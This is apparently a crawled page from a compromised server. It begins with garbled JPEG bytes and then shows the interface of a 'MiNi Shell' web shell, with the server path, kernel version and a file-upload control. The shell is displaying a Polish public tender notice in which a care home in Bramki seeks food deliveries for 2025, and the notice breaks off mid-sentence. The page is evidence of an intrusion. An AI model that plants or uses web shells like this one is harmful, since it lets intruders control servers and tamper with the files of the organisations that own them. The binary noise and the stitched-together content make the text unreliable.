JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241031/0057305201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej w Bramkach na rok 2025. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;Dom Pomocy Społecznej im. Księdza Kardynała Józefa Glempa w Bramkach&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000295811</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Północna 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bramki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-870</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 7256127</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">22 7256066</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@dpsbramki.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bramki.dps.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej w Bramkach na rok 2025. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1213ee02-c513-4358-afba-cbeceed560a4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00573052</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00010932/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa artykułów żywnościowych (mięsa, wędlin, drobiu i wyrobów drobiowych, nabiału, pieczywa, produktów głęboko mrożonych, warzyw i owoców oraz art. spożywczych i jaj) dla DPS Bramki w roku 2025.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/bramki_dps <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/bramki_dps</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawiera Rozdział XII i XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Realizacja obowiązku informacyjnego w związku z wymaganiami Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwane dalej RODO<br/>1.	Administrator Danych<br/>Dom Pomocy Społecznej w Bramkach, ul. Północna 18, 05-870 Błonie, w imieniu którego działa Dyrektor. Kontakt z Dyrektorem: tel.: (22) 725-61-27, mail: info@dpsbramki.org<br/>2.	Kontakt z Inspektorem Ochrony Danych<br/>We wszystkich sprawach związanych z przetwarzaniem danych można się kontaktować z Inspektorem Ochrony Danych z panią Justyną Rytel-Kuc za pomocą poczty elektronicznej: jrkdoradztwo@gmail.com lub pisemnie na adres: Dom Pomocy Społecznej w Bramkach, ul. Północna 18, 05-870 Błonie.<br/>3.	Cel przetwarzania danych<br/>Pani/Pana dane osobowe są przetwarzane przez Administratora na podstawie art. 6 ust. 1 lit. a, b, c, e oraz art. 9 ust. 1 lit. g Rozporządzenia RODO i obowiązujących przepisów prawa tj.:<br/>•	Ustawy z dnia 12 marca 2004 r. o pomocy społecznej,<br/>•	Ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych,<br/>•	Ustawy z dnia 7 września 2007 r. o pomocy osobom uprawnionym do alimentów,<br/>•	Ustawa z dnia 15 kwietnia 2011 r. o działalności leczniczej,<br/>•	Zawartych umów oraz na podstawie udzielonej zgody.<br/>•	W celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego. Oznaczenie sprawy DA.26.6.2023<br/>Dane są przetwarzane w celu realizacji zadań ustawowych tj. celu zawarcia lub wykonania umowy z osobą, której dane dotyczą. Dane te są niezbędne do rozpatrzenia określonej sprawy i wykorzystywane przez Dom Pomocy Społecznej w Bramkach do prowadzonych postępowań administracyjnych, zmierzających do wydania decyzji administracyjnych lub innych, w celu przyznania świadczeń. W pozostałych przypadkach Pani/Pana dane osobowe przetwarzane są wyłącznie na podstawie wcześniej udzielonej zgody w zakresie i celu określonym w treści zgody.<br/>4.	Udostępnianie danych osobowych<br/>Pani/Pana dane osobowe mogą być udostępniane organom władzy publicznej oraz podmiotom wykonującym zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa. Dane mogą być przekazywane również innym podmiotom, z którymi Dom Pomocy Społecznej w Bramkach podpisał stosowne umowy. Przekazanie danych realizowane będzie na podstawie zawartych umów powierzenia przetwarzania danych, dla których Administratorem jest Dom Pomocy Społecznej w Bramkach, a podmioty przetwarzające mogą je przetwarzać jedynie za zgodą Administratora w określonym celu i zakresie.<br/>5.	Przechowywane danych osobowych<br/>Pani/Pana dane osobowe będą przechowywane jedynie w okresie niezbędnym do realizacji celu, dla którego zostały zebrane oraz po jego realizacji przez okres wskazany przepisami prawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.26.12.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 759641,78 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Dostawa artykułów żywnościowych – mięsa, wędlin, drobiu i wyrobów drobiowych dla DPS Bramki w roku 2025”.<br/>Lp	Podane w treści nazwy pochodzenia art. nie są bezwzględnie obowiązujące, dopuszcza się art. równoważne jakością lub lepsze	Jm.	Ilość	Cena jednostkowa brutto	Wartość brutto<br/>1	Baleron gotowany - wędzonka wieprzowa, wędzona, parzona z dodatkiem wody ok. 1,5 kg Skład: mięso wieprzowe minimum 68%	kg	252 <br/>2	Boczek rolowany wędzony z dodatkiem mieszanki przypraw obsypany, majerankiem Skład: mięso wieprzowe minimum 93%	kg	33 <br/>3	Boczek wędzony zawartość mięsa min. 95%	kg	73 <br/>4	Karkówka wieprzowa surowa bez kości, bez słoniny mięso elastyczne, poprzerastane powięziami, soczyste barwa jasnoróżowa z widocznym przerostem tłuszczowym. Waga jednego kawałka ok. 2,5 kg.	kg	303 <br/>5	Kaszanka - wyrób podrobowy parzony, średnio rozdrobniony w naturalnej osłonce, ok. 120 g Skład: mięso wieprzowe minimum 18 %, wątroba wieprzowa minimum 12 %, kasza gryczana.	kg	76 <br/>6	Kiełbasa biała zawartość mięsa min. 62%	kg	209 <br/>7	Kiełbasa blokowa typu tyrolska	kg	277 <br/>8	Kiełbasa dębicka (nie rozdrobniona)	kg	305 <br/>9	Kiełbasa krakowska podsuszana (nie rozdrobniona)	kg	60 <br/>10	Kiełbasa podwawelska (nie rozdrobniona) zawartość mięsa min. 77%	kg	407 <br/>11	Kiełbasa szynkowa - kiełbasa z grubo rozdrobniona z mięsa wieprzowego, dodatkiem wołowiny i słoniny, wędzona, parzona Skład : mięso wieprzowe minimum 66%	kg	209 <br/>12	Kiełbasa szynkowa z indyka (nie rozdrobniona) zawartość mięsa min. 60%	kg	303 <br/>13	Kiełbasa żywiecka (nie rozdrobniona) zawartość mięsa min. 53%	kg	299 <br/>14	Kości schabowe	kg	400 <br/>15	Kości wędzone	kg	50 <br/>16	Łopatka bez kości, bez skóry bez golonki, bez słoniny surowa z małym przerostem tłuszczowym, delikatna i soczysta z część górnej kończyny przedniej. Barwa od jasnoróżowej do czerwonej Waga jednego kawałka ok. 3,5 kg, mięso chłodzone	kg	1735 <br/>17	Parówki 50% mięsa chudego bez MOM (Hot Dog)	kg	533 <br/>18	Paszteciki 131g	szt.	667 <br/>19	Pasztet drobiowy pieczony zawartość mięsa min. 53% (typu Ciechanowski)	kg	123 <br/>20	Pasztet pieczony - wyrób garmażeryjny wieprzowy pieczony Skład: mięso wieprzowe minimum 53 %,	kg	160 <br/>21	Pasztet z żurawiną	kg	100 <br/>22	Pieczeń Rzymska	kg	429 <br/>23	Piersi z kurczaka (filet) schłodzony kg	747 <br/>24	Polędwica miodowa - wędlina z fileta z indyka średnio rozdrobniona, parzona formowana w baton w osłonce, wyczuwalna lekka miodowa nuta Skład: mięso indycze minimum 70 %	kg	464 <br/>25	Polędwica sopocka - wędzonka parzona Skład; polędwica wieprzowa minimum 80 %	kg	743 <br/>26	Polędwica z kurczaka - wędlina drobiowa, nie wędzona, parzona Skład: mięso z piersi kurczaka minimum 84 %	kg	291 <br/>27	Polędwiczki wieprzowa surowa	kg	20 <br/>28	Porcje rosołowe z kurczaka	kg	2027 <br/>29	Salami w czosnku- produkt drobno rozdrobniony surowy, dojrzewający, suszony, obtoczony czosnkiem. Do wyprodukowania 100 g tego wyrobu powinno zostać zużyte minimum 68 g mięsa wieprzowego, minimum 34 % mięsa z kurczaka i max. 11 g tłuszczu wieprzowego	kg	20 <br/>30	Salceson czosnkowy	kg	147 <br/>31	Salceson włoski - wyrób podrobowy, parzony, ok. 1,5 kg we flaku Skład: głowy wieprzowe minimum 60 %, mięso wieprzowe minimum 30%	kg	48 <br/>32	Schab wieprzowy surowy b\k -tkanka mięśniowa jędrna i jednolita, mięso soczyste i delikatne, barwa jasnoróżowa, otoczone z wierzchu błoną . Waga jednego kawałka ok. 4 kg, mięso chłodzone	kg	389 <br/>33	Serdelki drobiowe około 50g szt. minimum 70% mięsa	kg	200 <br/>34	Słonina wieprzowa bez skóry	kg	47 <br/>35	Szynka konserwowa wieprzowa, prasowana Skład: mięso wieprzowe minimum 60 %	kg	333 <br/>36	Szynka wędzona - wędlina ciemno wędzona, parzona o kruchym delikatnym smaku Skład: mięso wieprzowe minimum 82%	kg	160 <br/>37	Szynka wiejska - wyrób wędzony, parzony Skład: mięso wieprzowe minimum 70%	kg	37 <br/>38	Szynka wieprzowa gotowana, z małą ilością tłuszczu, wędzonka wieprzowa wędzona, parzona Skład: mięso wieprzowe minimum 69%	kg	337 <br/>39	Szynka wieprzowa surowa	kg	93 <br/>40	Szynka z piersi kurczaka - wędlina drobiowa, parzona Skład: mięso z piersi kurczaka minimum 84 %	kg	431 <br/>41	Udziec z kurczaka bez kości max 150g	kg	300 <br/>42	Udziec kurczaka z kością (180g-200g)	kg.	721 <br/>43	Wątroba wieprzowa kg	33 <br/>44	Wątróbka drobiowa	kg	364 <br/>45	Żeberka paski extra wieprzowe	kg	27 <br/>46	Żołądki drobiowe	kg	50 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 235420,57 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującym/i kryterium/ami.<br/><br/><br/>l.p.	<br/>Kryterium	Znaczenie<br/>procentowe<br/>kryterium	Maksymalna ilość punktów jakie może otrzymać oferta<br/>za dane kryterium<br/>1) Cena ( C ) 60 % 60 punktów<br/>2) Częstotliwość dostaw (T) 30 % 30 punktów<br/>3) Wymiana asortymentu w dniu dostawy (R) 10 % 10 punktów<br/><br/>2. Zasady oceny kryterium &#34;Cena&#34; (C).<br/>Przyznane pkt C =	cena (brutto) najniższa x 60 pkt<br/> cena (brutto) badanej oferty<br/><br/>3.Zasady oceny kryterium „Częstoliwość dostaw” (T).<br/>Ocena będzie dokonywana poprzez porównanie zaoferowanej częstotliwości dostaw zawartych w formularzu oferty:<br/>- dostawy codziennie (dni robocze) w godz. 8:00 – 11:00 - 30 pkt.<br/>- dostawy codziennie (dni robocze) w godz. 11:30 – 14:30 - 25 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 15 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 10 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 5 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 1 pkt.<br/><br/>4. Zasady oceny kryterium „Wymiana asortymentu w dniu dostawy” (R).<br/>Wymiana reklamowanego asortymentu w dniu dostawy – oferta, w której Wykonawca zaoferuje wymianę reklamowanego asortymentu w dniu jego dostawy (nie później niż do godz. 14:30) otrzyma 10 punktów. Wykonawca, który nie zaoferuje wymiany reklamowanego asortymentu w dniu dostawy otrzyma 0 punków.<br/>Liczba .punktów określona zostanie na podstawie poniższego wzoru:<br/> C+T+R<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 p.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwosć dostaw (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiana asortymentu w dniu dostawy (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Dostawa artykułów żywnościowych – nabiału dla DPS Bramki w roku 2025”.<br/>Lp	Podane w treści nazwy pochodzenia art. nie są bezwzględnie obowiązujące, dopuszcza się art. równoważne jakością lub lepsze	Jm.	Ilość	Cena jednostkowa brutto	Wartość brutto<br/>1	Drożdże 100 g	szt.	227 <br/>2	Jogurt naturalny w kubku 150g	szt.	7413 <br/>3	Jogurt owocowy w kubku 150. (różne smaki)	szt.	373 <br/>4	Masło o zawartości tłuszczu 82% 200g	szt.	2707 <br/>5	Miks tłuszczowy w kostce 200g - całkowita zawartość tłuszczu 76% (64% tłuszcz roślinny, 12% tłuszcz mleczny)	szt.	8667 <br/>6	Mleko 2% UHT - 1l	l.	12667 <br/>7	Ser biały chudy	kg.	563 <br/>8	Ser biały półtłusty min. 3% tłuszczu	kg.	801 <br/>9	Ser feta 270g	szt.	21 <br/>10	Ser żółty chudy w plastrach do 13% tłuszczu	kg.	136 <br/>11	Ser żółty półtłusty w plastrach 15%-20% tłuszczu	kg.	240 <br/>12	Serek topiony śmietankowy 100g	Szt.	400 <br/>13	Śmietana 18% - 400g	l.	1120 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 156642,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującym/i kryterium/ami.<br/><br/><br/>l.p.	<br/>Kryterium	Znaczenie<br/>procentowe<br/>kryterium	Maksymalna ilość punktów jakie może otrzymać oferta<br/>za dane kryterium<br/>1) Cena ( C ) 60 % 60 punktów<br/>2) Częstotliwość dostaw (T) 30 % 30 punktów<br/>3) Wymiana asortymentu w dniu dostawy (R) 10 % 10 punktów<br/><br/>2. Zasady oceny kryterium &#34;Cena&#34; (C).<br/>Przyznane pkt C =	cena (brutto) najniższa x 60 pkt<br/> cena (brutto) badanej oferty<br/><br/>3.Zasady oceny kryterium „Częstoliwość dostaw” (T).<br/>Ocena będzie dokonywana poprzez porównanie zaoferowanej częstotliwości dostaw zawartych w formularzu oferty:<br/>- dostawy codziennie (dni robocze) w godz. 8:00 – 11:00 - 30 pkt.<br/>- dostawy codziennie (dni robocze) w godz. 11:30 – 14:30 - 25 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 15 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 10 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 5 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 1 pkt.<br/><br/>4. Zasady oceny kryterium „Wymiana asortymentu w dniu dostawy” (R).<br/>Wymiana reklamowanego asortymentu w dniu dostawy – oferta, w której Wykonawca zaoferuje wymianę reklamowanego asortymentu w dniu jego dostawy (nie później niż do godz. 14:30) otrzyma 10 punktów. Wykonawca, który nie zaoferuje wymiany reklamowanego asortymentu w dniu dostawy otrzyma 0 punków.<br/>Liczba .punktów określona zostanie na podstawie poniższego wzoru:<br/> C+T+R<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających 